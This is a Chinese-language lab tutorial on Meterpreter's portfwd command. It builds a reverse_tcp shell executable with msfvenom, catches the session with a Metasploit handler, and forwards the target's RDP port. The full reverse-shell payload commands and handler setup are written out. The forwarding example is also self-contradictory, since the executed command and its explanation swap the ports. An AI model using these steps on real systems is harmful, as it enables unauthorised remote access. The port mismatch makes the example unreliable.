Meterpreter中有一个命令,可以替代lcx,nc等来解决大部分端口转发问题
命令:portfwd
攻击机:kali 10.10.1.104
靶机:windowsxp 10.10.1.103
靶机打开3389端口方便验证
portfwd
拿到目标机的meterpreter shell 生成一个木马
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.104 LPORT=4444 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
在靶机上运行该shell 成功上线
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.1.104
lhost => 10.10.1.104
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.1.104:4444
[*] Sending stage (180291 bytes) to 10.10.1.103
[*] Meterpreter session 1 opened (10.10.1.104:4444 -> 10.10.1.103:1043) at 2020-06-24 09:43:54 -0400
meterpreter >
使用portfwd进行转发, portfwd是meterpreter的一个网络命令,只能在meterpreter shell里面运行
meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
-L <opt> Forward: local host to listen on (optional). Reverse: local host to connect to.
-R Indicates a reverse port forward.
-h Help banner.
-i <opt> Index of the port forward entry to interact with (see the "list" command).
-l <opt> Forward: local port to listen on. Reverse: local port to connect to.
-p <opt> Forward: remote port to connect to. Reverse: remote port to listen on.
-r <opt> Forward: remote host to connect to.
meterpreter >
下面开始转发
meterpreter > portfwd add -l 3389 -r 10.10.1.103 -p 23389
[*] Local TCP relay created: :3389 <-> 10.10.1.103:23389
meterpreter > portfwd
Active Port Forwards
====================
Index Local Remote Direction
----- ----- ------ ---------
1 0.0.0.0:3389 10.10.1.103:23389 Forward
1 total active port forwards.
meterpreter >
portfwd add -l 23389 -r 10.10.1.103 -p 3389
这句话的意思是把远程主机的3389端口转发到本地的23389进行监听
连接本地23389端口,成功登陆
其他
列出端口转发条目
portfwd list
删除id为1的端口转发
portfwd delete -i 1
清空所有转发
portfwd flush